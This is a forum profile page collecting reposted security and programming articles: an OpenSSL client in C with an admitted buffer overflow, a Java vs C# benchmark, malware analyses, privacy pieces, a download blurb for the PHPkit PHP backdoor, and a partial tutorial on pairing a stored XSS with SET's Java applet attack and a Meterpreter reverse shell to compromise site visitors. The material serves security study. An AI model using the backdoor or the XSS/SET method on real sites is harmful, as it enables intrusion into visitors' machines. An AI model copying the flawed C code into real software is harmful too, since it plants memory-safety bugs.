Everything posted by Nytro

  1. [h=2]An SSL Client Using OpenSSL[/h] by admin, under c++

Recently I wrote about how to use OpenSSL to connect to a plain data server; this time I'm modifying the same code to perform encrypted connections. Naturally this is more of an example of how to use the API than production-ready code. Its main purpose is to show the very small difference between using the library as I did last time and how that example can be altered to create a basic SSL client. The essential changes to the code below are the replacement of the connection function 'connect_unencrypted(host_and_port)' with 'connect_encrypted(host_and_port, store_path, store_type, &ctx, &ssl)' and the introduction of the SSL cleanup step 'SSL_CTX_free(ctx)'. All other changes are purely cosmetic, which really shows how simple adding SSL to your application connections can be. Externally, you need to provide the root CA certificate against which the connection will be verified. That's it.

At this point I could warble through the connection function, but you should just read through it yourself and consult the SSL man pages. Note that there is a dreadful buffer overflow possibility in this code and no real error handling, just a bit of logging. This is to keep the example short, and also because only you will know what valid handling should take place for each situation when you write your own code. So take a look and enjoy.

To try this out yourself:

1. Make sure that you have Firefox, GCC and OpenSSL (development sources and libraries) installed.
2. Copy the following code to a file called 'main.c' in a directory that you will be playing around in.
3. Compile the code using 'gcc main.c -o sslclient -lssl' if you are on Linux, or 'gcc main.c -o sslclient -lssl -lcrypto' if you are on OS X.
4. Select an SSL (https) web site to connect to and find the root CA's certificate name in the site's certificate.
Either export the appropriate root CA from Firefox, or obtain it directly from the CA online in PEM format, and copy it to a file 'certificate.pem' in the same directory as the 'sslclient' file. Then run the following command: './sslclient servername:443 "GET / \r\n\r\n" certificate.pem f e'

/*
 * File: main.cpp
 *
 * Licence: GPL2
 */

/* Standard headers */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* OpenSSL headers */
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/**
 * Simple log function
 */
void slog(char* message) {
    fprintf(stdout, message);
}

/**
 * Print SSL error details
 */
void print_ssl_error(char* message, FILE* out) {
    fprintf(out, message);
    fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error()));
    fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL));
    ERR_print_errors_fp(out);
}

/**
 * Print SSL error details with inserted content
 */
void print_ssl_error_2(char* message, char* content, FILE* out) {
    fprintf(out, message, content);
    fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error()));
    fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL));
    ERR_print_errors_fp(out);
}

/**
 * Initialise OpenSSL
 */
void init_openssl() {
    /* call the standard SSL init functions */
    SSL_load_error_strings();
    SSL_library_init();
    ERR_load_BIO_strings();
    OpenSSL_add_all_algorithms();

    /* seed the random number system - only really necessary for systems
     * without '/dev/random' */
    /* RAND_add(?,?,?); need to work out a cryptographically significant way
     * of generating the seed */
}

/**
 * Close a connection gracefully
 */
int close_connection(BIO* bio) {
    int r = 0;

    r = BIO_free(bio);
    if (r == 0) {
        /* Error unable to free BIO */
    }

    return r;
}

/**
 * Connect to a host using an unencrypted stream
 */
BIO* connect_unencrypted(char* host_and_port) {
    BIO* bio = NULL;

    /* Create a new connection */
    bio = BIO_new_connect(host_and_port);
    if (bio == NULL) {
        print_ssl_error("Unable to create a new unencrypted BIO object.\n", stdout);
        return NULL;
    }

    /* Verify successful connection */
    if (BIO_do_connect(bio) != 1) {
        print_ssl_error("Unable to connect unencrypted.\n", stdout);
        close_connection(bio);
        return NULL;
    }

    return bio;
}

/**
 * Connect to a host using an encrypted stream
 */
BIO* connect_encrypted(char* host_and_port, char* store_path, char store_type,
                       SSL_CTX** ctx, SSL** ssl) {
    BIO* bio = NULL;
    int r = 0;

    /* Set up the SSL pointers */
    *ctx = SSL_CTX_new(SSLv23_client_method());
    *ssl = NULL;

    /* Load the trust store from the pem location in argv[2] */
    if (store_type == 'f')
        r = SSL_CTX_load_verify_locations(*ctx, store_path, NULL);
    else
        r = SSL_CTX_load_verify_locations(*ctx, NULL, store_path);
    if (r == 0) {
        print_ssl_error_2("Unable to load the trust store from %s.\n", store_path, stdout);
        return NULL;
    }

    /* Setting up the BIO SSL object */
    bio = BIO_new_ssl_connect(*ctx);
    BIO_get_ssl(bio, ssl);
    if (!(*ssl)) {
        print_ssl_error("Unable to allocate SSL pointer.\n", stdout);
        return NULL;
    }
    SSL_set_mode(*ssl, SSL_MODE_AUTO_RETRY);

    /* Attempt to connect */
    BIO_set_conn_hostname(bio, host_and_port);

    /* Verify the connection opened and perform the handshake */
    if (BIO_do_connect(bio) < 1) {
        print_ssl_error_2("Unable to connect BIO.%s\n", host_and_port, stdout);
        return NULL;
    }

    if (SSL_get_verify_result(*ssl) != X509_V_OK) {
        print_ssl_error("Unable to verify connection result.\n", stdout);
    }

    return bio;
}

/**
 * Read from a stream and handle restarts if necessary
 */
ssize_t read_from_stream(BIO* bio, char* buffer, ssize_t length) {
    ssize_t r = -1;

    while (r < 0) {
        r = BIO_read(bio, buffer, length);
        if (r == 0) {
            print_ssl_error("Reached the end of the data stream.\n", stdout);
            continue;
        } else if (r < 0) {
            if (!BIO_should_retry(bio)) {
                print_ssl_error("BIO_read should retry test failed.\n", stdout);
                continue;
            }
            /* It would be prudent to check the reason for the retry and
             * handle it appropriately here */
        }
    }

    return r;
}

/**
 * Write to a stream and handle restarts if necessary
 */
int write_to_stream(BIO* bio, char* buffer, ssize_t length) {
    ssize_t r = -1;

    while (r < 0) {
        r = BIO_write(bio, buffer, length);
        if (r <= 0) {
            if (!BIO_should_retry(bio)) {
                print_ssl_error("BIO_write should retry test failed.\n", stdout);
                continue;
            }
            /* It would be prudent to check the reason for the retry and
             * handle it appropriately here */
        }
    }

    return r;
}

/**
 * Main SSL demonstration code entry point
 */
int main(int argc, char** argv) {
    char* host_and_port = argv[1];     /* localhost:4422 */
    char* server_request = argv[2];    /* "GET / \r\n\r\n" */
    char* store_path = argv[3];        /* /home/user/projects/sslclient/certificate.pem */
    char store_type = argv[4][0];      /* f = file, anything else is a directory structure */
    char connection_type = argv[5][0]; /* e = encrypted, anything else is unencrypted */

    char buffer[4096];
    buffer[0] = 0;

    BIO* bio;
    SSL_CTX* ctx = NULL;
    SSL* ssl = NULL;

    /* initialise the OpenSSL library */
    init_openssl();

    /* encrypted link */
    if (connection_type == 'e') {
        if ((bio = connect_encrypted(host_and_port, store_path, store_type,
                                     &ctx, &ssl)) == NULL)
            return (EXIT_FAILURE);
    }
    /* unencrypted link */
    else if ((bio = connect_unencrypted(host_and_port)) == NULL)
        return (EXIT_FAILURE);

    write_to_stream(bio, server_request, strlen(server_request));
    read_from_stream(bio, buffer, 4096);
    printf("%s\r\n", buffer);

    if (close_connection(bio) == 0)
        return (EXIT_FAILURE);

    /* clean up the SSL context resources for the encrypted link */
    if (connection_type == 'e')
        SSL_CTX_free(ctx);

    return (EXIT_SUCCESS);
}

Sursa: An SSL Client Using OpenSSL
  2. Java vs. C#: Which Performs Better in the ‘Real World’? by Jeff Cogswell | January 17, 2013

Java and C# each have their fans (and detractors). But which language wins out in a set of real-world performance tests? Let’s compare Java and C#, two programming languages with large numbers of ardent fans and equally virulent detractors. Despite all the buzzing online (“I’m about to rant. Who else hates working in C#?” one blog might complain, even as another insists: “Java ruined my life.”), it’s hard to find real-life benchmarks for each language’s respective performance. What do I mean by real life? I’m not interested in yet another test that grindingly calculates a million digits’ worth of Pi. I want to know about real-world performance: How does each language measure up when asked to dish out millions of Web pages a day? How do they compare when having to grab data from a database to construct those pages dynamically? These are the kinds of stats that tech folk like to know when choosing a platform.

Before we get started, we need to establish some terminology. When you write Java code, you usually target the Java Virtual Machine (JVM). In other words, your code is compiled to bytecode, and that bytecode runs under the management of the JVM. C#, meanwhile, generally runs under the Microsoft Common Language Runtime (CLR), and is similarly compiled to bytecode. Java and C#, then, are really just languages. In theory you could write Java code that targets the Microsoft CLR, and you could write C# code that targets the JVM. Indeed, there are several languages that target the JVM, including Erlang, Python, and more. The most common languages targeting the CLR (in addition to C#) are Microsoft’s own Visual Basic.NET, as well as its own flavor of C++ called C++.NET. The CLR also offers support for several less-common languages, including Python and Microsoft’s own F#.
Further, the two runtimes include frameworks that are a set of classes written by Oracle/Sun and Microsoft for the JVM and CLR, respectively. Oracle has its Java Platform, along with various APIs. Microsoft’s .NET framework is a huge set of classes supporting development for the CLR; indeed, most people simply refer to the system as .NET rather than CLR. As such, we need to lay some groundwork for what we’re trying to accomplish. First, we’re not really comparing the languages themselves. What we need to compare is the underlying runtime. But even more than that, we need to also compare the performance of the frameworks. Therefore I’m going to do multiple comparisons, but ultimately try to match up apples to apples. For example, it’s very possible to write your own HTTP listener in either C# or Java, and just send back an HTML page generated dynamically. But the reality is, almost nobody actually writes a low-level HTTP listener; instead, they tend to use existing HTTP servers. Most C# web apps rely on Microsoft’s IIS server. Server-side Java, on the other hand, can work with several different servers, including the Apache HTTP server and the Tomcat server. (Tomcat, for example, was built specifically to interact with server-side Java.) While we want to compare apples to apples, we want to stay realistic. The servers will very likely play a role in the responses, as one might be faster than the other. Even though the HTTP servers are not technically part of the runtime, they are almost always used, and will therefore play a factor—that’s why, after a first test in which we skip those servers and write our own small HTTP servers, we’ll try similar tests with the respective HTTP servers to get a more complete and accurate picture. Static files are another issue, and I’m going to stay clear of them. 
Some of you may disagree, but with today’s architectures, if you seek fast performance for static files such as JavaScript or CSS files, you can easily put them on a cloud server that has replication across the country, use DNS configuration to locate the server closest to the client, and send them down very quickly. So for that reason I’m going to skip that part. Plus, if you’re trying to maximize performance, you probably don’t want your Web application dishing out static files when it should be focusing on its real work of reading databases, building dynamic content, and so on.

A Quick Note on the Hardware

I want to make sure the hardware in question introduces as few extraneous variables as possible. My own development machine has a ton of software on it, including many services that start up and steal processor time. Ideally, I would devote one entire core to the Java or C# process, but unfortunately core allocation works the other way: you can limit a process to a single core, but you can’t stop other processes from using that core. So instead I’m allocating large servers on Amazon EC2, with close-to-barebones systems. Because I don’t want to compare Linux to Windows, and C# is primarily for Windows (unless we bring Mono in, which we’re not), I’ll run all tests on Windows. On the client end, I don’t want network latency to interfere with the results either; a moment of slowness during one test would throw off the results. So I made the decision to run the client code on the same machine. While I can’t force the OS to reserve cores for a single process, I can force each process onto a single core, which is what I did.

Collecting the Results

The results are timed on the client side. The optimal way to do this involves capturing the time and saving it, capturing the time again as needed, and continuing that way, without performing any time calculations until everything is done. Further, don’t print out anything at the console until all is done.
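The capture-now, compute-later discipline described above can be sketched in a few lines of Java; the iteration count and the no-op workload below are placeholders, not the article's actual client code:

```java
// Record raw timestamps while the test runs; do all arithmetic and
// console output only after the timed loop has finished.
public class Timings {
    public static long[] measure(int iterations, Runnable work) {
        long[] stamps = new long[iterations + 1];
        stamps[0] = System.nanoTime();
        for (int i = 0; i < iterations; i++) {
            work.run();
            stamps[i + 1] = System.nanoTime(); // capture only; no math yet
        }
        return stamps;
    }

    public static void report(long[] stamps) {
        // All calculation and printing happens after measurement is over.
        long totalMs = (stamps[stamps.length - 1] - stamps[0]) / 1_000_000;
        System.out.println("total: " + totalMs + " ms for "
                + (stamps.length - 1) + " requests");
    }
}
```

Swapping the Runnable for a real page fetch gives the per-run totals the article reports, without console output skewing the numbers.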
One mistake I’ve seen people make is to grab a time at given points, and also at each point calculate the time difference and print it to the console. Consoles are slow, especially if they’re scrolling. So we’ll wait until we’re finished before calculating the time differences and writing to the console.

The Client Code

It doesn’t really matter what we use for the client code, as long as we use it consistently in all tests. The client code will mimic the browser and time how long it takes to retrieve a page from the server. I could use either C# or Java; I ended up using C# because it has a very easy WebClient class and an easy timer class.

First Test: Listening for HTTP

Let’s get started. The first test will simply be code that opens an HTTP listener and sends out dynamically generated Web pages. First: the Java version. There are many ways we can implement this, but I want to draw attention to two separate approaches. One is to open a TCP/IP listener on port 80 and wait for incoming connections; this is a very low-level approach where we would use the Socket class. The other is to use the existing HttpServer class. I’m going to use the HttpServer class, and here’s why: if we really wanted to track the speed of Java compared to C# without the Web, we could run some basic benchmarks that don’t involve the Web at all; we could create two console applications that spin through a bunch of mathematical equations and perhaps do some string searching and concatenation, but that’s a topic for another day. We’re focusing on the Web here, so I’ll start with the HttpServer class, and similarly with the equivalent in C#. Right off the bat I find what appears to be an anomaly: the Java version takes roughly 450 times as long to complete each request. Processing 5 requests in a row takes a total of 17615 ticks when retrieving a string from a CLR program that uses the HttpListener class, whereas processing 5 requests to the Java server running the HttpServer class takes 7882975 ticks.
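For reference, a minimal version of the Java side of this first test might look like the following sketch, built on the JDK's com.sun.net.httpserver.HttpServer; the port handling and page text are illustrative assumptions, not the article's exact code:

```java
import com.sun.net.httpserver.HttpServer;
import java.io.OutputStream;
import java.net.InetSocketAddress;

// Serve a small dynamically generated page via the built-in HttpServer,
// in the spirit of the article's first Java test. Pass 0 to bind an
// ephemeral port (handy for testing).
public class MiniHttpServer {
    public static HttpServer start(int port) throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
        server.createContext("/", exchange -> {
            String body = "<html><body>The date and time is "
                    + java.time.LocalDateTime.now() + "</body></html>";
            byte[] bytes = body.getBytes();
            exchange.sendResponseHeaders(200, bytes.length);
            try (OutputStream os = exchange.getResponseBody()) {
                os.write(bytes);
            }
        });
        server.start(); // uses a default executor
        return server;
    }
}
```

A client looping over HTTP GETs against this handler reproduces the shape of the measurement, though absolute numbers will of course differ from machine to machine.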
(When I switch to milliseconds, I see numbers such as 4045 milliseconds to process 15 requests on the Java server, and only 2 milliseconds to process 15 requests on the C# server.) Adding some debugging info to the Java server, I discover that the function responsible for responding to incoming requests and sending out data actually runs quickly, nowhere near the three seconds or so being reported. The bottleneck appears to be somewhere in the Java framework, when the data is sent back to the client. But the problem doesn’t exist when communicating with the C# client. To get to the bottom of this one, I decide to switch to a different Java server. Instead of using the heavier HttpServer class, I create a simple TCP/IP socket listener using the ServerSocket class. I manually construct a header string and a body that matches what I’m sending down in the C# version. After that, I see a huge improvement. I can run a large number of tests; I perform 2000 requests, one after the other, not gathering the time until the 2000 calls to the Java server are finished; then I perform a similar process with the C# server. In this case, I can use milliseconds for the measurement. Calling the Java server 2000 times takes 2687 milliseconds. Calling the C# server 2000 times takes 214 milliseconds. The C# one is still much faster. Because of this discrepancy, I feel compelled to try out the Java version on a Linux server. The server used is a “c1.medium” on Amazon EC2. I install the two different Java servers and see essentially the same speeds. The HttpServer class takes about 14 seconds to process 15 requests. Not very good. And finally, to be absolutely sure, I write an equivalent client program in Java that retrieves the data. It records similar times as well.

Second Test: Full Website

It’s rare that people roll their own HTTP servers. Instead, C# programmers usually use IIS; Java programmers have a few choices, including Tomcat.
For my tests I’m going to use those two servers. For C#, I’m going to specifically use the ASP.NET MVC 4 platform running on IIS 8. I’m going to take two approaches: first, returning a string of HTML from the controller itself; second, returning a view that includes a date/time lookup. For the Java tests, I can take two similar approaches: I can have a servlet return some HTML, or I can return the results of a JSP page. These are analogous to the C# controller and view approaches, respectively. I could use the newer JavaServer Faces or any number of other frameworks; if you’re interested, you might try some tests against those other frameworks. The C# controller simply returns a string of HTML. Running my client test for 2000 iterations sees a time of 991 milliseconds total. That’s still faster than my Java socket version. The view version of the C# app creates a full standards-compliant HTML page, with an html element, head element, meta element, title element, body element, and an inner div element containing the text “The date and time is” followed by the full date and the full time. The date and time are retrieved through the DateTime.Now property, and filled in dynamically with each request. Running the client test for 2000 iterations against this view version takes 1804 milliseconds, about twice as long as the direct one. The direct one returns shorter HTML, but increasing the size of the HTML string to match the view version shows no difference; it hovers around the 950-1000 millisecond mark. Even adding in the dynamic date and time doesn’t result in any noticeable increase. The view version takes twice as long as the controller version, regardless. Now let’s move on to Java. The servlet is just as simple as the controller in the C# version. It just returns a string that contains an HTML page. Retrieving 2000 instances takes 479 milliseconds. That’s roughly half the time of the C# controller: very fast indeed. Returning a JSP page is also fast.
As with C#, it takes a bit longer than the controller approach. In this case, retrieving 2000 copies takes 753 milliseconds. Adding in a call in the JSP file to retrieve the date makes no noticeable difference. In fact, the Tomcat server apparently performs some optimization, because after a few more requests, the time to retrieve 2000 copies went all the way down to 205 milliseconds.

Conclusion

These results are quite interesting. Having worked as a professional C# programmer for many years, I’ve been told anecdotally that .NET is one of the fastest runtimes around. Clearly these tests show otherwise. Of course, the tests are quite minimal; I didn’t do massive calculations, nor did I do any database lookups. Our space is limited here, but perhaps another day soon I can add in some database tests and report back. Meanwhile, Java is the clear winner here. Image: Bjorn Hoglund/Shutterstock.com Sursa: Java vs. C#: Which Performs Better in the 'Real World'?
  3. Detecting System Intrusions Prepared on January 15, 2013 by Demyo Inc., a one hundred percent IT-security-oriented company headquartered in Miami, Florida, USA. Demyo Inc. delivers comprehensive penetration testing, vulnerability assessment, incident response, and compliance audit services, just to name a few. Find out more at: Demyo, Inc. info@demyo.com

Introduction

First things first: detecting system intrusions is not the same as an Intrusion Detection System/Intrusion Prevention System (IDS/IPS). We want to detect a system intrusion once attackers have passed all the defensive technologies in the company, such as the IDS/IPS mentioned above, full packet capture devices with analysts behind them, firewalls, physical security guards, and all other preventive technologies and techniques. Many preventive technologies rely on blacklisting [1] most of the time, and that is why they fail: blacklisting allows everything by default and forbids only what is considered malicious, so for an attacker it is merely a challenge to find yet another way to bypass the filter. It is much harder to circumvent a whitelisting system.

Download: www.exploit-db.com/download_pdf/24155
  4. PHP Kit 0.2a Authored by infodox PHPkit is a simple PHP-based backdoor, leveraging include() and php://input to allow the attacker to execute arbitrary PHP code on the infected server. The actual backdoor contains no suspicious calls such as eval() or system(), as the PHP code is executed in memory by include(). Download: http://packetstormsecurity.com/files/download/119637/phpkit-0.2a.tar.gz Sursa: PHP Kit 0.2a ? Packet Storm
  5. Cve-2011-3402 Technical Analysis Description: CVE-2011-3402 is well known as the Windows Kernel TrueType 0-day used in the Duqu attack(s). Recently this exploit has begun to appear in several crimeware exploit kits... Actually, not just the exploit, but the entire font file used by Duqu is now being harnessed to infect a large population with malware. This talk will mostly be an extremely low-level walk-through of the font program within this TrueType font, which is used to manipulate the Windows Kernel into executing the native x86 shellcode. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Cve-2011-3402 Technical Analysis
  6. Zeus -- Registry Analysis Using Volatility Framework Description: In this video I will show you how to analyze the registry from memory using the Volatility Framework. I'm using a Zeus memory image for the registry analysis, and I will show some (not all) of F-Secure's top 10 malware registry launchpoints. Download the Zeus memory image: http://malwarecookbook.googlecode.com/svn-history/r26/trunk/17/1/zeus.vmem.zip Most trojans, worms, backdoors, and such make sure they will be run after a reboot by introducing autorun keys and values into the Windows registry. Some of these registry locations are better documented than others, and some are more commonly used than others. One of the first steps to take when doing forensic analysis is to check the most obvious places in the registry for modifications. Source: Top10 malware registry launchpoints - F-Secure Weblog : News from the Lab Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Zeus -- Registry Analysis Using Volatility Framework
  7. Gsm: Cell Phone Network Review Description: Did you notice 262 42 in your mobile phone network search list at the last CCC events? Did you and your friends buy SIM cards at the PoC and help test the network by calling each other, or by calling through the bridge to the DECT network services? Did you ever wonder about the details of this open source test network, set up by a team of volunteers in the middle of the city? We would like to tell you all the details of the cell phone network we operate at 29C3, and show you some fancy graphs based on the network activity! We will describe the process of setting up the test network we operate at 29C3, the legal and technical challenges we have faced, and the actual installation at the CCH. We will also compare this with the 262 42 test networks that were operated using the same open source software, but with otherwise very different installations, at CCC Camp 2011 and 28C3. We will go on to show various statistics that we collect from the network while it has been running. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Gsm: Cell Phone Network Review
  8. Ipv6 Domain Scanner Description: In this video I will show you how to use dnsdict6. I will run the tool against Google, enumerating subdomains along with their IPv6 addresses and services. The dnsdict6 tool is very powerful, fast, and easy to use. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Ipv6 Domain Scanner
  9. [h=1]"Red October" - part two, the modules[/h] GReAT, Kaspersky Lab Expert Posted January 17, 14:21 GMT Earlier this week, we published our report on “Red October”, a high-level cyber-espionage campaign that during the past five years has successfully infiltrated computer networks at diplomatic, governmental and scientific research organizations. In part one, we covered the most important parts of the campaign: the anatomy of the attack, a timeline of the attacker’s operation, the geographical distribution of the victims, sinkhole information, and a high-level overview of the C&C infrastructure. Today we are publishing part two of our research, which comprises over 140 pages of technical analysis of the modules used in the operation. When analyzing targeted attacks, researchers sometimes focus on the superficial system infection and how it occurred. Sometimes that is sufficient, but at Kaspersky Lab we have higher standards. This is why our philosophy is that it’s important to analyze not just the infection, but to answer three very important questions: What happens to the victim after they’re infected? What information is being stolen? Why is “Red October” such a big deal compared to other campaigns like Aurora or Night Dragon? To our knowledge, never before in the history of ITSec has a cyber-espionage operation been analyzed in such deep detail, with a focus on the modules used for attack and data exfiltration. In most cases, the analysis is compromised by the lack of access to the victim’s data; the researchers see only some of the modules and do not understand the full purpose of the attack or what was stolen. To get around these hiccups, we set up several fake victims around the world and monitored how the attackers handled them over the course of several months. This allowed us to collect hundreds of attack modules and tools.
In addition to these, we identified many other modules used in other attacks, which allowed us to gain a unique insight into the attack. The research that we are publishing today is perhaps the biggest malware research paper ever. It is certainly the most complex malware research effort in the history of our company, and we hope that it sets new standards for what anti-virus and anti-malware research means today. Because of its size, we've split "part 2" into several pieces, to make reading easier:

[h=2]First stage of attack[/h]
  • Exploits
  • Dropper
  • Loader Module
  • Main component

[h=2]Second stage of attack[/h]
  • Modules, general overview
  • Recon group
  • Password group
  • Email group
  • USB drive group
  • Keyboard group
  • Persistence group
  • Spreading group
  • Mobile group
  • Exfiltration group

Sursa: "Red October" - part two, the modules - Securelist
  10. Vba32 AntiRootkit is designed to analyze the computer for anomalies that arise due to the presence of malware in the system. With it, you will be able to detect and neutralize both known and unknown viruses that are present in your system in an active state. This program is a good assistant in the work of a specialist struggling with complicated infections.

Vba32 AntiRootkit advantages:
  • Free of charge
  • Does not require installation
  • Can be used with any antivirus software installed on your computer
  • Uses a unique feature for the detection of "clean" files
  • Can be used in several modes
  • Supports the maintenance of a system status report in html format
  • Treatment of the system may be done using a scripting language
  • Supports Windows 7
  • Help files in Russian and English languages
  • Part of Vba32 Personal and Vba32 Check

To analyze the system, it is enough to run the utility and click the Start button, or select the menu File->Logging State (if you wish to get the report in html format). Done!

md5: 033aaa0c8d172d68e97c6e1cc3fb6461 sha1: 8872c8df8fa008a1222333b895ac6b42caefb347 Download FREE version Download User Guide (CHM, English) Discussion forum Sursa: Vba32 AntiRootkit | FREE Utilities | VirusBlokAda
  11. Whoa, it's showing me Kaspersky's hooks on the SSDT, me gusta
  12. Forget OOP, PHP, and the other junk; first of all, to pass the admission exam you need to know C/C++ and algorithms at a decent level. You'll have time for the rest afterwards. I'd advise you to expect a lot of math shoved down your throat, though, even at the admission exam. PS: At least that's how it is at the University of Bucharest.
  13. [h=1]Google Tracked Web Users Bypassing iPhone Security[/h] This is an era where innovative technologies hit the market on a regular basis, and people have grown quite accustomed to the technological changes that take place so frequently; their lives have become heavily dependent on these modern technologies. Be it the internet, mobile smartphones, or television media, people have become deeply attached to these devices. Along with the enormous advantages of modern communication devices and the internet, however, come points of concern. Data breaches, security hacking, and unethical business practices carried out with the help of modern technologies have become more severe these days. Recently, the Wall Street Journal reported on an unethical business practice that is making waves in the mobile communication market. The Journal accused major online advertising companies like Google of compromising the security settings of iPhone and Apple desktop users who run the Safari browser on their devices. The Wall Street Journal accused not only Google but also other major online advertising firms, including PointRoll, Vibrant Media, and WPP, of using specific code to trick the extremely popular Safari web browser. This allowed them to secretly monitor the behavior of iPhone users by bypassing default security settings designed specifically to block such intrusions. Bypassing security settings is not the correct approach to tracking user behavior or understanding commercial cycles. This attempt not only kept most iPhone and Safari users in the dark, it also called into question the overall security and privacy policies of these notable advertisers. It should be recalled that Apple's default privacy settings expressly disallow any company from using cookies to track user behavior across different web-enabled services.
However, notable advertisers like Google never thought twice before breaching this security for mere commercial tracking. And for what? Some commercial gain. It is an insulting approach, and these advertisers deserve to be sued for their conduct; at the very least, a firm apology is expected. Remarkably, to date neither Google nor any of the other advertisers has apologized for this behavior. This suggests they may well carry out such activities again in the future. They did disable the secret tracking code once The Wall Street Journal exposed their activities, but remained unapologetic, instead trying to convince the public that the Journal had completely misunderstood their approach. In a public statement, Google claimed that the cookies it used were not for tracking any sort of public behavior, and that those cookies were not capable of collecting any personal information. The other companies involved in the breach likewise never admitted guilt; many of these advertisers said they were entirely unaware of any security breach or illegal activity. Many tech and web companies offer free products and earn revenue through online advertising. But remember that these companies often try to act too cleverly, crossing clients' privacy lines to learn about customer behavior. Whatever the commercial gains, such an approach does not help build a positive reputation, and breaching security is a serious offense that can result in legal action. About the author: Margaret is a blogger by profession. She loves writing, reading and travelling. She is an avid golfer and answers how much to ship golf clubs by suggesting Shipsticks golf.
Sursa: Google Tracked Web Users Bypassing iPhone Security | Ethical Hacking-Your Way To The World Of IT Security
  14. Facebook Graph Search may be a social engineering nightmare Facebook's new search engine serves up the kind of data that cyber scammers love By Ted Samson | InfoWorld Facebook's newly unveiled Graph Search search engine is an intriguing marriage of social networking and big data, creating opportunities for people to easily connect with prospective business partners, customers, friends, dates, and so on. At the same time, it's tough to ignore that Graph Search could be used as an on-tap source of social engineering data, which cyber scammers and malicious hackers could use and abuse in any number of ways. If you missed Facebook's big announcement about Graph Search, it's basically a Facebook search engine with which you can track down Facebook users who meet particular criteria (say, people who live in Chicago and are software developers). You can also search for pictures or businesses that meet particular criteria (such as "pictures of my friends at Disneyland" or "attorneys that my friends recommend.") Social engineering entails using personal details about a victim (where they work, where they went to school, who they're married to, what their interests are) to gain trust so that you can scam them, hack them, or otherwise take advantage. Hacking competitions in recent years have added social engineering events as the tactic has gained in popularity. Graph Search appears to be well suited for serving up the very data that a scammer might use to dupe a target. Though Graph Search is not yet available to users, Facebook is offering a glimpse of what its searches might yield. Based simply on the outcome of a sample search, I could see how the tool could be used to quickly gather enough personal data about fellow Facebook users to successfully launch social-engineering-style attacks.
For my sample search, I logged in with a bogus Facebook account I created long ago when I was interested in playing admittedly insipid Facebook games -- the ones that require you to have as many Facebook friends as possible in order to advance. I have around 445 friends on this account; I know there are other Facebook game-players with more -- as well as an underground market for such accounts. I clicked the sample Graph Search search button, and it looked up "people who live in my city." In this case, the city was New York, New York, per my account settings. The search results included a list of 12 people, none of whom I know in real life. As far as I can tell, they are all either Facebook friends or friends of friends. To me, they're all strangers on the Internet. Accompanying the dozen search results are the users' names and a profile picture, along with such data as where they live, how old they are, where they work or attend school, whether they are in a relationship, what sort of music they like, what interests they have, and the Facebook friends we have in common. All of that data could be used for social-engineering-style chicanery. Bear in mind, too, that this is a sample search, and I didn't even get to choose the criteria. As Facebook describes Graph Search, you'll be able to perform far more granular searches (searches for pictures with select people or searches for businesses your friends recommend), which can be useful but can also be wielded for potentially more pointed attacks. Facebook has stressed that the data that shows up in the Graph Search searches is data users have chosen to make public. But keep in mind: A lot of clueless, ignorant, and/or overly trusting users out there don't necessarily know how to protect themselves online, not even in a sandbox like Facebook where security controls aren't that hard to find. 
Here's what Facebook had to say about Graph Search and privacy: When you share something on Facebook, you get to decide exactly who can see that content. This, of course, is why Graph Search is such a powerful experience: A lot of what you will find is content that is not public, but content that someone has shared with a limited audience that happens to include you.... One challenge in particular is worth calling out. Consider the relatively simple Graph Search query, "Photos of Facebook employees." For starters, we make sure that only photos that the owner has shared with the person conducting the search can be seen on the photo results page. But we have also to make sure that each photo features at least one person who has shared with the searcher that they work at Facebook! Otherwise we would implicitly be revealing content that the searcher does not have access to. Although it's nice to know that Facebook is aware of the security challenge, one has to wonder whether the company will be able to maintain a handle on keeping private data private with so much data and so many "privacy checks" running in the background. Graph Search is slated for release this summer, with beta testing opening up to select users in the interim. Time will tell whether privacy and security concerns are warranted. This story, "Facebook Graph Search may be a social engineering nightmare," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Facebook Graph Search may be a social engineering nightmare | Internet privacy - InfoWorld
  15. Better to just edit /etc/hosts with the .geek domains, it's simpler. That way we could make .rst domains of our own, too.
  16. Stored XSS And SET Stored XSS is the most dangerous type of cross-site scripting, because a user can be exploited simply by visiting the page where the vulnerability occurs. If that user happens to be the administrator of the website, this can lead to compromise of the web application, which is one reason the risk is higher than for a reflected XSS. In real-world scenarios, once a stored XSS vulnerability has been discovered, the penetration tester reports the issue and provides a brief explanation of the potential risks in the final report, but does not take the attack further unless the client asks for it. A malicious attacker, however, will not stop there: he will try to attack users by combining tools and methods. So in this article we will examine how an attacker can use SET together with a stored XSS in order to obtain shells from users. First of all, stored XSS can be discovered in web applications that allow users to store information such as comments, message boards, page profiles, shopping carts, etc. Let's say that we have a web application with the following form: Comment Form Vulnerable to XSS In order to test it for XSS we will try to pass the following script into the comment field: Alert Box – JavaScript Code The result will be the following: Comment Field Vulnerable to XSS Now that we know where the vulnerability exists, we can launch the Social-Engineer Toolkit. SET – Menu The attack that we are going to choose is the Java Applet Attack Method. Java Applet Attack Method We will enter our IP address so that the reverse shell connects back to us, and we will choose the first option, Java Required. SET Configurations Next we have to choose our payload and our encoder. In this case we will use a simple Meterpreter Reverse TCP payload and the famous shikata_ga_nai encoder.
